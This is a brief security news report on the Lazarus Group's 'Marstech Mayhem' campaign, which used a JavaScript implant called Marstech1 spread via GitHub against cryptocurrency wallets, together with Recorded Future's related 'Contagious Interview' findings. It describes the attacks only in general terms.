SecurityScorecard has uncovered a new operation dubbed “Marstech Mayhem,” attributed to North Korea’s Lazarus Group. The campaign features a previously unknown JavaScript implant called Marstech1, targeting developers through a GitHub repository managed by a profile named “SuccessFriend.”

The malware, first detected in December 2024, has affected 233 victims across the U.S., Europe, and Asia. It primarily focuses on cryptocurrency-related targets, specifically targeting browser extensions and cryptocurrency wallets including MetaMask, Exodus, and Atomic across Windows, Linux, and macOS platforms.

Key Features of the Attack:
– Sophisticated obfuscation techniques including control flow flattening and multi-stage XOR decryption
– Capability to collect system information
– Potential for supply chain attacks through website and NPM package embedding
– Command-and-control server operations on ports 3000 and 3001

In a related development, Recorded Future identified a parallel campaign called “Contagious Interview,” targeting cryptocurrency organizations between October and November 2024. This operation, attributed to North Korean IT workers operating under various aliases (PurpleBravo, CL-STA-0240, Famous Chollima, and Tenacious Pungsan), poses significant risks including data theft and potential sanctions violations for organizations unknowingly employing these operators.

The GitHub profile associated with the attack has since been removed, but the ongoing campaign highlights the persistent threat posed by North Korean cyber operations to the cryptocurrency and technology sectors.